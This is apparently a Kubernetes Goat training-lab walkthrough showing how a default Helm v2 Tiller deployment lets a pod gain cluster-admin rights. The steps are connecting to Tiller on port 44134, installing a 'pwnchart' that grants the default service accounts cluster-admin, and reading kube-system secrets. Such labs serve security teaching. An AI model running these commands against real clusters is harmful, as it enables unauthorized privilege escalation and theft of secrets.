Helm v2 tiller to PwN the cluster
Scenario Information
Helm is a package manager for Kubernetes. It's like apt-get for ubuntu. In this scenario, we will see the older version of helm (version 2), tiller service RBAC default setup to gain access to the completed cluster.
- To get started with the scenario, run the following command
kubectl run --rm --restart=Never -it --image=madhuakula/k8s-goat-helm-tiller -- bash
Scenario Solution
- By default helm version 2 tiller deployment has RBAC with full cluster administrator privileges
- So the default installation is in
kube-systemnamespace with service nametiller-deployand port44134exposed to0.0.0.0. So we can verify by running telnet command
telnet tiller-deploy.kube-system 44134
- Now, we are able to connect to the tiller service port. We can use the helm binary to perform operations and talk to tiller service
helm --host tiller-deploy.kube-system:44134 version
- Let's try if we can get Kubernetes secrets from the cluster from
kube-systemnamespace
kubectl get secrets -n kube-system
- Now we can create our own helm chart to give permission to default service account full cluster admin access, as by default the current pod deployed in default namespace which has default service account
helm --host tiller-deploy.kube-system:44134 install --name pwnchart /pwnchart
- Now the
pwncharthas been deployed, it has given all the default service accounts cluster admin access. Hence let's try getting thekube-systemnamespace secrets again
kubectl get secrets -n kube-system
This scenario varies how the tiller deployment has been performed, sometimes admins deploy tiller to specific namespace with specific privilege. Also from Helm version 3 there is no tiller service to mitigate such vulnerabilities